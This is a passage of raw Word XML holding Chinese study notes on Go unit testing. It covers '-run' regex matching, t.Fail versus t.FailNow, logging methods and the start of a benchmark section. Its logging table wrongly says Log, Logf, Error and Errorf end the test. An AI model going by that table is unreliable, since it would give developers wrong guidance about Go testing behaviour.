        <w:t>--- PASS: TestA (0.00s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72402E2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        select_test.go:6: A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23387DB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>=== RUN   TestAK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AC731" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>--- PASS: TestAK (0.00s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF87F1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        select_test.go:10: AK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E314CFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463241B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>ok          command-line-arguments        0.003s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D015D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TestA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TestAK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的测试用例都被执行，原因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟随的测试用例的名称支持正则表达式，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-run TestA$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可只执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TestA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试用例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA39A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E2B906" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标记单元测试结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0F099" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func TestFailNow(t *testing.T) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AFA1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.FailNow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA3740" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328670BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9FB802" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func TestFail(t *testing.T) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C630B28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("before fail")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAFBC9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.Fail()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3F75A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("after fail")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32951E80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBFD012" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629E0586" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346CE5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>=== RUN   TestFail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E674962" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>before fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7703A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>after fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD3E959" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>--- FAIL: TestFail (0.00s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABC057" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>FAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEAE9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>exit status 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D6AD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>FAIL        command-line-arguments        0.002s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177AD16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从日志中看出，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fail() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后测试结果标记为失败，但是第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行依然被程序执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17382B0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>单元测试日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7F6D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个测试用例可能并发执行，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing.T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的日志输出可以保证日志跟随这个测试上下文一起打印输出。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">testing.T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了几种日志输出方法，详见下表所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824CE79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1711DF49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单元测试框架提供的日志方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AFB981" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C565E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印日志，同时结束测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A1916" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Logf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化打印日志，同时结束测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E118AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印错误日志，同时结束测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C0A07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Errorf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化打印错误日志，同时结束测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009977F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fatal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印致命日志，同时结束测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9C09A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fatalf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化打印致命日志，同时结束测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F29F483" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发者可以根据实际需要选择合适的日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379627D2" w14:textId="0A0A1ADE" w:rsidR="004C452C" w:rsidRDefault="00FD5814" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>enchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得代码内存占用和运行效率的性能数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CAA3DE" w14:textId="77A3BA5B" w:rsidR="004C452C" w:rsidRDefault="005503BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005503BB">
        <w:t>https://geektutu.com/post/hpg-benchmark.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E50D4" w14:textId="598F9E4B" w:rsidR="00D60420" w:rsidRDefault="00D60420" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B895CF" w14:textId="4BC73B02" w:rsidR="00D60420" w:rsidRDefault="00D60420" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93D5B7" w14:textId="77777777" w:rsidR="00A8659F" w:rsidRDefault="00A8659F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">benchmark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和普通的单元测试用例一样，都位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> _test.go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203CC1CC" w14:textId="6B7A9DF3" w:rsidR="005503BB" w:rsidRDefault="00A8659F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>函数名以</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Benchmark </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，参数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b *testing.B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。和普通的单元测试用例很像，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>单元测试函数名以</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开头，参数是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> t *testing.T</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C796C" w14:textId="5A0A76A0" w:rsidR="005503BB" w:rsidRDefault="005503BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7653EFDE" w14:textId="7FC7F13E" w:rsidR="00F93951" w:rsidRDefault="00F93951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go test &lt;module name&gt;/&lt;package name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>某个</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>内的所有测试用例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E73167">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> test </w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
